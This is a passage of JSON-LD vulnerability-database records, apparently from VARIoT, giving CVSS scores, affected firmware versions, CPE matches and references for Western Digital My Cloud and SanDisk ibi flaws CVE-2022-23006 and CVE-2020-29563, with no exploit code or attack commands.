},
{
"db": "CNNVD",
"id": "CNNVD-202103-759"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-21-277"
},
{
"db": "CNVD",
"id": "CNVD-2022-06495"
},
{
"db": "VULMON",
"id": "CVE-2021-3310"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004443"
},
{
"db": "NVD",
"id": "CVE-2021-3310"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-759"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-03-11T00:00:00",
"db": "ZDI",
"id": "ZDI-21-277"
},
{
"date": "2022-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-06495"
},
{
"date": "2021-03-10T00:00:00",
"db": "VULMON",
"id": "CVE-2021-3310"
},
{
"date": "2021-11-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-004443"
},
{
"date": "2021-03-10T05:15:13.517000",
"db": "NVD",
"id": "CVE-2021-3310"
},
{
"date": "2021-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202103-759"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-06-29T00:00:00",
"db": "ZDI",
"id": "ZDI-21-277"
},
{
"date": "2022-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-06495"
},
{
"date": "2021-03-17T00:00:00",
"db": "VULMON",
"id": "CVE-2021-3310"
},
{
"date": "2021-11-22T08:38:00",
"db": "JVNDB",
"id": "JVNDB-2021-004443"
},
{
"date": "2021-03-17T17:42:35.880000",
"db": "NVD",
"id": "CVE-2021-3310"
},
{
"date": "2021-03-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202103-759"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-759"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western\u00a0Digital\u00a0My\u00a0Cloud\u00a0OS\u00a05\u00a0 Link interpretation vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-004443"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "post link",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-759"
}
],
"trust": 0.6
}
}
VAR-202209-1975
Vulnerability from variot - Updated: 2023-12-18 13:31A stack-based buffer overflow vulnerability was found on Western Digital My Cloud Home, My Cloud Home Duo, and SanDisk ibi that could allow an attacker accessing the system locally to read information from /etc/version file. This vulnerability can only be exploited by chaining it with another issue. If an attacker is able to carry out a remote code execution attack, they can gain access to the vulnerable file, due to the presence of insecure functions in code. User interaction is required for exploitation. Exploiting the vulnerability could result in exposure of information, ability to modify files, memory access errors, or system crashes. (DoS) It may be in a state. Western Digital My Cloud, etc. are all products of Western Digital (Western Digital). Western Digital My Cloud is a personal cloud storage device. Western Digital My Cloud Home is an easy-to-use personal cloud storage device. SanDisk ibi and so on are all products of SanDisk Corporation of the United States. SanDisk ibi is an intelligent photo organizer and media storage hard drive.
There is a buffer overflow vulnerability in Western Digital products. Attackers can use this vulnerability to access the system locally and read the /etc/version file
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202209-1975",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "my cloud home",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "8.10.0-117"
},
{
"model": "sandisk ibi",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "8.10.0-117"
},
{
"model": "my cloud home duo",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "8.10.0-117"
},
{
"model": "my cloud home duo",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "sandisk ibi",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud home",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "digital my cloud home",
"scope": "lt",
"trust": 0.6,
"vendor": "western",
"version": "8.10.0-117"
},
{
"model": "digital my cloud home duo",
"scope": "lt",
"trust": 0.6,
"vendor": "western",
"version": "8.10.0-117"
},
{
"model": "digital sandisk ibi",
"scope": "lt",
"trust": 0.6,
"vendor": "western",
"version": "8.10.0-117"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-88804"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018157"
},
{
"db": "NVD",
"id": "CVE-2022-23006"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_home_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "8.10.0-117",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_home:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_home_duo_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "8.10.0-117",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_home_duo:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:sandisk_ibi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "8.10.0-117",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:sandisk_ibi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-23006"
}
]
},
"cve": "CVE-2022-23006",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 3.7,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 1.9,
"id": "CNVD-2022-88804",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"author": "psirt@wdc.com",
"availabilityImpact": "NONE",
"baseScore": 1.8,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"exploitabilityScore": 0.3,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.7,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2022-23006",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2022-23006",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "psirt@wdc.com",
"id": "CVE-2022-23006",
"trust": 1.0,
"value": "LOW"
},
{
"author": "CNVD",
"id": "CNVD-2022-88804",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202209-2808",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-88804"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018157"
},
{
"db": "NVD",
"id": "CVE-2022-23006"
},
{
"db": "NVD",
"id": "CVE-2022-23006"
},
{
"db": "CNNVD",
"id": "CNNVD-202209-2808"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A stack-based buffer overflow vulnerability was found on Western Digital My Cloud Home, My Cloud Home Duo, and SanDisk ibi that could allow an attacker accessing the system locally to read information from /etc/version file. This vulnerability can only be exploited by chaining it with another issue. If an attacker is able to carry out a remote code execution attack, they can gain access to the vulnerable file, due to the presence of insecure functions in code. User interaction is required for exploitation. Exploiting the vulnerability could result in exposure of information, ability to modify files, memory access errors, or system crashes. (DoS) It may be in a state. Western Digital My Cloud, etc. are all products of Western Digital (Western Digital). Western Digital My Cloud is a personal cloud storage device. Western Digital My Cloud Home is an easy-to-use personal cloud storage device. SanDisk ibi and so on are all products of SanDisk Corporation of the United States. SanDisk ibi is an intelligent photo organizer and media storage hard drive. \n\r\n\r\nThere is a buffer overflow vulnerability in Western Digital products. Attackers can use this vulnerability to access the system locally and read the /etc/version file",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-23006"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018157"
},
{
"db": "CNVD",
"id": "CNVD-2022-88804"
},
{
"db": "VULMON",
"id": "CVE-2022-23006"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-23006",
"trust": 3.9
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018157",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2022-88804",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202209-2808",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-23006",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-88804"
},
{
"db": "VULMON",
"id": "CVE-2022-23006"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018157"
},
{
"db": "NVD",
"id": "CVE-2022-23006"
},
{
"db": "CNNVD",
"id": "CNNVD-202209-2808"
}
]
},
"id": "VAR-202209-1975",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-88804"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-88804"
}
]
},
"last_update_date": "2023-12-18T13:31:57.211000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018157"
},
{
"db": "NVD",
"id": "CVE-2022-23006"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23006"
},
{
"trust": 2.4,
"url": "https://www.westerndigital.com/support/product-security/wdc-22015-western-digital-my-cloud-home-and-sandisk-ibi-firmware-version-8-10-0-117"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-23006/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-88804"
},
{
"db": "VULMON",
"id": "CVE-2022-23006"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018157"
},
{
"db": "NVD",
"id": "CVE-2022-23006"
},
{
"db": "CNNVD",
"id": "CNNVD-202209-2808"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2022-88804"
},
{
"db": "VULMON",
"id": "CVE-2022-23006"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018157"
},
{
"db": "NVD",
"id": "CVE-2022-23006"
},
{
"db": "CNNVD",
"id": "CNNVD-202209-2808"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-12-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-88804"
},
{
"date": "2022-09-27T00:00:00",
"db": "VULMON",
"id": "CVE-2022-23006"
},
{
"date": "2023-10-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-018157"
},
{
"date": "2022-09-27T23:15:12.720000",
"db": "NVD",
"id": "CVE-2022-23006"
},
{
"date": "2022-09-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202209-2808"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-12-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-88804"
},
{
"date": "2022-09-28T00:00:00",
"db": "VULMON",
"id": "CVE-2022-23006"
},
{
"date": "2023-10-18T08:12:00",
"db": "JVNDB",
"id": "JVNDB-2022-018157"
},
{
"date": "2022-10-03T18:40:17.377000",
"db": "NVD",
"id": "CVE-2022-23006"
},
{
"date": "2022-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202209-2808"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202209-2808"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0Western\u00a0Digital\u00a0 Out-of-bounds write vulnerabilities in the product",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018157"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202209-2808"
}
],
"trust": 0.6
}
}
VAR-202012-0950
Vulnerability from variot - Updated: 2023-12-18 13:27An issue was discovered on Western Digital My Cloud OS 5 devices before 5.07.118. A NAS Admin authentication bypass vulnerability could allow an unauthenticated user to gain access to the device. This vulnerability allows remote attackers to bypass authentication on affected installations of Western Digital MyCloud PR4100. Authentication is not required to exploit this vulnerability.The specific flaw exists within the mod_rewrite module. The issue results from the way the software parses URLs to make authorization decisions. An attacker can leverage this vulnerability to bypass authentication on the system
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202012-0950",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "my cloud os 5",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "5.07.118"
},
{
"model": "my cloud os 5",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud os 5",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "my cloud os 5 firmware 5.07.118"
},
{
"model": "mycloud pr4100",
"scope": null,
"trust": 0.7,
"vendor": "western digital",
"version": null
},
{
"model": "digital my cloud os",
"scope": "eq",
"trust": 0.6,
"vendor": "western",
"version": "5\u003c5.07.118"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-20-1446"
},
{
"db": "CNVD",
"id": "CNVD-2022-06496"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014425"
},
{
"db": "NVD",
"id": "CVE-2020-29563"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_os_5:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.07.118",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex2_ultra:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_mirror_gen_2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-29563"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "orangetw",
"sources": [
{
"db": "ZDI",
"id": "ZDI-20-1446"
}
],
"trust": 0.7
},
"cve": "CVE-2020-29563",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2020-29563",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2022-06496",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2020-29563",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2020-29563",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-29563",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "ZDI",
"id": "CVE-2020-29563",
"trust": 0.7,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2022-06496",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202012-942",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-20-1446"
},
{
"db": "CNVD",
"id": "CNVD-2022-06496"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014425"
},
{
"db": "NVD",
"id": "CVE-2020-29563"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-942"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Western Digital My Cloud OS 5 devices before 5.07.118. A NAS Admin authentication bypass vulnerability could allow an unauthenticated user to gain access to the device. This vulnerability allows remote attackers to bypass authentication on affected installations of Western Digital MyCloud PR4100. Authentication is not required to exploit this vulnerability.The specific flaw exists within the mod_rewrite module. The issue results from the way the software parses URLs to make authorization decisions. An attacker can leverage this vulnerability to bypass authentication on the system",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-29563"
},
{
